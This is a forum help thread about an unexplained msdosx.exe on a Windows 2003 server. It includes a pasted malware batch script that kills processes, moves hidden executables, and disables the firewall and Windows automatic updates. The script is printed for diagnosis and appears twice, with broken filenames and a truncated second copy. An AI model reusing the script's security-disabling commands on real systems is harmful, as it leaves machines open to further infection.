zombie99
asked on
msdosx.exe
Keep finding msdosx.exe on c:\ from an Win2k3 server. AV, Spyware software does not find any problems.
Does anyone know what this is?
Does anyone know what this is?
ASKER
Same thing I have found. But if you delete it after rebooting it comes back.
Then try using different Anti virus and spyware. What all have you used?
ASKER
I got Mcafee Groupshield (it happens to be an Exchange server..) with the latest update & SuperAnti Spyware... in the past these have worked for me.
I appreciate the help
I appreciate the help
Try some of the free ones like AVG or spybot.
AVG
http://free.avg.com/download-avg-anti-virus-free-edition
Spybot
http://www.safer-networking.org/en/download/index.html
AVG
http://free.avg.com/download-avg-anti-virus-free-edition
Spybot
http://www.safer-networking.org/en/download/index.html
ASKER
Ok, after doing some research... I found under the \windows\temp folder a hiden file called bt3388.bat, that creates a mess on the windows\system and system32 folders.
Also, apparently this "virus" is new since there was no information prior to 02/13/09.
This is the script on the file:
cd %windir%\fix
attrib -s -h %windir%\system32\lssas.ex e
attrib -s -h %windir%\system32\spooIsv. exe
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.e xe
attrib -s -h %windir%\system32\Isass.ex e
attrib -s -h %windir%\system32\winIogon .exe
attrib -s -h %windir%\system32\regsvr.e xe
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.ex e
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.e xe
attrib -s -h %windir%\system32\spoolsvc .exe
attrib -s -h %windir%\system32\no.exe.e xe
attrib -s -h %windir%\system32\csrmgr.e xe
attrib -s -h %windir%\system32\csrms.ex e
attrib -s -h %windir%\system32\wgareg.e xe
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost. exe
attrib -s -h %windir%\system\wuauclt.ex e
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareserv ice.exe
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service. exe
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wms ncs.exe
attrib -s -h %windir%\system32\hgcheck. exe
attrib -s -h %windir%\system32\afisicx. exe
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr. exe
attrib -s -h %windir%\system32\roytctm. exe
attrib -s -h %windir%\system32\soxpeca. exe
attrib -s -h %windir%\system32\tdydowkc .exe
attrib -s -h %windir%\system32\wsldoekd .exe
attrib -s -h %windir%\system32\udxfytw. sys
attrib -s -h %windir%\system32\msservic e.exe
attrib -s -h %windir%\system32\csrsc.ex e
attrib -s -h %windir%\system32\wscntfys vc.exe
attrib -s -h %windir%\system32\msnco.ex e
move %windir%\system32\lssas.ex e %windir%\temp\%random%
move %windir%\system32\spooIsv. exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.ex e %windir%\temp\%random%
move %windir%\system32\winIogon .exe %windir%\temp\%random%
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.ex e %windir%\temp\%random%
move %windir%\system32\spooIsv. exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.ex e %windir%\temp\%random%
move %windir%\system32\winIogon .exe %windir%\temp\%random%
move %windir%\system32\msddns.e xe %windir%\temp\%random%
move %windir%\system32\regsvr.e xe %windir%\temp\%random%
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.ex e %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.ex e %windir%\temp\%random%
move %windir%\system32\csrsc.ex e %windir%\temp\%random%
move %windir%\system32\wscntfys vc.exe %windir%\temp\%random%
move %windir%\system32\msnco.ex e %windir%\temp\%random%
move %windir%\system32\msservic e.exe %windir%\temp\%random%
move %windir%\system32\wgareg.e xe %windir%\temp\%random%
move %windir%\system32\sysmgr.e xe %windir%\temp\%random%
move %windir%\system32\spoolsvc .exe %windir%\temp\%random%
move %windir%\system32\no.exe.e xe %windir%\temp\%random%
move %windir%\system32\udxfytw. sys %windir%\temp\%random%
move %windir%\system32\tpszxyd. sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.e xe %windir%\temp\%random%
move %windir%\system32\afisicx. exe %windir%\temp\%random%
move %windir%\system32\noytcyr. exe %windir%\temp\%random%
move %windir%\system32\wsldoekd .exe %windir%\temp\%random%
move %windir%\system32\roytctm. exe %windir%\temp\%random%
move %windir%\system32\tdydowkc .exe %windir%\temp\%random%
move %windir%\system32\mabidwe. exe %windir%\temp\%random%
move %windir%\system32\soxpeca. exe %windir%\temp\%random%
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.e xe %windir%\temp\%random%
pv -kf msddns.exe
move %windir%\system32\msddns.e xe %windir%\temp\%random%
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.ex e %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.ex e %windir%\temp\%random%
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.e xe %windir%\temp\%random%
pv -kf regsvr.exe
move %windir%\system32\regsvr.e xe %windir%\temp\%random%
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.ex e %windir%\temp\%random%
move %windir%\system32\wscntfys vc.exe %windir%\temp\%random%
move %windir%\system32\msnco.ex e %windir%\temp\%random%
move %windir%\system32\msservic e.exe %windir%\temp\%random%
move %windir%\system32\wgareg.e xe %windir%\temp\%random%
move %windir%\system32\sysmgr.e xe %windir%\temp\%random%
move %windir%\system32\spoolsvc .exe %windir%\temp\%random%
move %windir%\system32\no.exe.e xe %windir%\temp\%random%
move %windir%\system32\udxfytw. sys %windir%\temp\%random%
move %windir%\system32\tpszxyd. sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
cls
move %windir%\system32\sysmgr.e xe %windir%\temp\%random%
move %windir%\system32\afisicx. exe %windir%\temp\%random%
move %windir%\system32\noytcyr. exe %windir%\temp\%random%
move %windir%\system32\wsldoekd .exe %windir%\temp\%random%
move %windir%\system32\roytctm. exe %windir%\temp\%random%
move %windir%\system32\tdydowkc .exe %windir%\temp\%random%
move %windir%\system32\mabidwe. exe %windir%\temp\%random%
move %windir%\system32\soxpeca. exe %windir%\temp\%random%
move %windir%\system32\msservic e.exe %windir%\temp\%random%
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw. sys %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost. exe %windir%\temp\%random%
move %windir%\security\svchost. exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareserv ice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service. exe %windir%\temp\%random%
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wms ncs.exe %windir%\temp\%random%
move %windir%\system32\hgcheck. exe %windir%\temp\%random%
move %windir%\system32\afisicx. exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr. exe %windir%\temp\%random%
move %windir%\system32\roytctm. exe %windir%\temp\%random%
move %windir%\system32\soxpeca. exe %windir%\temp\%random%
move %windir%\system32\tdydowkc .exe %windir%\temp\%random%
cls
move %windir%\system32\wsldoekd .exe %windir%\temp\%random%
move %windir%\system32\udxfytw. sys %windir%\temp\%random%
pv -kf udxfytw.sys
move %windir%\system32\udxfytw. sys %windir%\temp\%random%
move %windir%\system32\hgcheck. exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck. exe %windir%\temp\%random%
move %windir%\system32\wins\wms ncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\system32\wins\wms ncs.exe %windir%\temp\%random%
move %windir%\system32\service. exe %windir%\temp\%random%
pv -kf service.exe
move %windir%\system32\service. exe %windir%\temp\%random%
move %windir%\system32\hgcheck. exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck. exe %windir%\temp\%random%
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost. exe %windir%\temp\%random%
scx config WinHost32Svr start= disabled
move %windir%\security\svchost. exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareserv ice.exe %windir%\temp\%random%
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareserv ice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx. exe
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr. exe
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm. exe
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca. exe
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc .exe
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd .exe
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.ex e %windir%\temp\%random%
scx delete ICF
move %windir%\system32\afisicx. exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr. exe %windir%\temp\%random%
move %windir%\system32\roytctm. exe %windir%\temp\%random%
move %windir%\system32\soxpeca. exe %windir%\temp\%random%
move %windir%\system32\tdydowkc .exe %windir%\temp\%random%
move %windir%\system32\wsldoekd .exe %windir%\temp\%random%
IF EXIST C:\recycler\s-1-5-21-14824 76501-1644 491937-682 003330-101 3\cfixer.e xe (
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482 476501-164 4491937-68 2003330-10 13"
move cfixer.exe %windir%\%random%
)
del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat
-------------------------- ---------- ---------- ---------- ----------
Any idea on how to reverse all this without re-installing?
Any help is appreciated.
Also, apparently this "virus" is new since there was no information prior to 02/13/09.
This is the script on the file:
cd %windir%\fix
attrib -s -h %windir%\system32\lssas.ex
attrib -s -h %windir%\system32\spooIsv.
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.e
attrib -s -h %windir%\system32\Isass.ex
attrib -s -h %windir%\system32\winIogon
attrib -s -h %windir%\system32\regsvr.e
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.ex
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.e
attrib -s -h %windir%\system32\spoolsvc
attrib -s -h %windir%\system32\no.exe.e
attrib -s -h %windir%\system32\csrmgr.e
attrib -s -h %windir%\system32\csrms.ex
attrib -s -h %windir%\system32\wgareg.e
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost.
attrib -s -h %windir%\system\wuauclt.ex
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareserv
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service.
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wms
attrib -s -h %windir%\system32\hgcheck.
attrib -s -h %windir%\system32\afisicx.
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr.
attrib -s -h %windir%\system32\roytctm.
attrib -s -h %windir%\system32\soxpeca.
attrib -s -h %windir%\system32\tdydowkc
attrib -s -h %windir%\system32\wsldoekd
attrib -s -h %windir%\system32\udxfytw.
attrib -s -h %windir%\system32\msservic
attrib -s -h %windir%\system32\csrsc.ex
attrib -s -h %windir%\system32\wscntfys
attrib -s -h %windir%\system32\msnco.ex
move %windir%\system32\lssas.ex
move %windir%\system32\spooIsv.
move %windir%\system32\csrs.exe
move %windir%\system32\Isass.ex
move %windir%\system32\winIogon
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.ex
move %windir%\system32\spooIsv.
move %windir%\system32\csrs.exe
move %windir%\system32\Isass.ex
move %windir%\system32\winIogon
move %windir%\system32\msddns.e
move %windir%\system32\regsvr.e
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.ex
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.ex
move %windir%\system32\csrsc.ex
move %windir%\system32\wscntfys
move %windir%\system32\msnco.ex
move %windir%\system32\msservic
move %windir%\system32\wgareg.e
move %windir%\system32\sysmgr.e
move %windir%\system32\spoolsvc
move %windir%\system32\no.exe.e
move %windir%\system32\udxfytw.
move %windir%\system32\tpszxyd.
move %windir%\system32\java.exe
move %windir%\system32\sysmgr.e
move %windir%\system32\afisicx.
move %windir%\system32\noytcyr.
move %windir%\system32\wsldoekd
move %windir%\system32\roytctm.
move %windir%\system32\tdydowkc
move %windir%\system32\mabidwe.
move %windir%\system32\soxpeca.
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.e
pv -kf msddns.exe
move %windir%\system32\msddns.e
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.ex
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.ex
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.e
pv -kf regsvr.exe
move %windir%\system32\regsvr.e
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.ex
move %windir%\system32\wscntfys
move %windir%\system32\msnco.ex
move %windir%\system32\msservic
move %windir%\system32\wgareg.e
move %windir%\system32\sysmgr.e
move %windir%\system32\spoolsvc
move %windir%\system32\no.exe.e
move %windir%\system32\udxfytw.
move %windir%\system32\tpszxyd.
move %windir%\system32\java.exe
cls
move %windir%\system32\sysmgr.e
move %windir%\system32\afisicx.
move %windir%\system32\noytcyr.
move %windir%\system32\wsldoekd
move %windir%\system32\roytctm.
move %windir%\system32\tdydowkc
move %windir%\system32\mabidwe.
move %windir%\system32\soxpeca.
move %windir%\system32\msservic
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw.
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.
move %windir%\security\svchost.
move %windir%\system\msddll.exe
move %windir%\system\svhost.exe
move %windir%\system\vmwareserv
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service.
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wms
move %windir%\system32\hgcheck.
move %windir%\system32\afisicx.
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.
move %windir%\system32\roytctm.
move %windir%\system32\soxpeca.
move %windir%\system32\tdydowkc
cls
move %windir%\system32\wsldoekd
move %windir%\system32\udxfytw.
pv -kf udxfytw.sys
move %windir%\system32\udxfytw.
move %windir%\system32\hgcheck.
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.
move %windir%\system32\wins\wms
pv -kf wmsncs.exe
move %windir%\system32\wins\wms
move %windir%\system32\service.
pv -kf service.exe
move %windir%\system32\service.
move %windir%\system32\hgcheck.
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.
scx config WinHost32Svr start= disabled
move %windir%\security\svchost.
move %windir%\system\msddll.exe
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe
move %windir%\system\svhost.exe
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe
move %windir%\system\vmwareserv
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareserv
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx.
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr.
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm.
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca.
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.ex
scx delete ICF
move %windir%\system32\afisicx.
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.
move %windir%\system32\roytctm.
move %windir%\system32\soxpeca.
move %windir%\system32\tdydowkc
move %windir%\system32\wsldoekd
IF EXIST C:\recycler\s-1-5-21-14824
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482
move cfixer.exe %windir%\%random%
)
del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat
--------------------------
Any idea on how to reverse all this without re-installing?
Any help is appreciated.
Any ideas yet? I am having the same problem. My system32 folder is filling up with temp*.bk files.
ASKER
Ended up deleteing everythng manually. It works now.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
http://www.greatis.com/appdata/d/m/msdos.exe.htm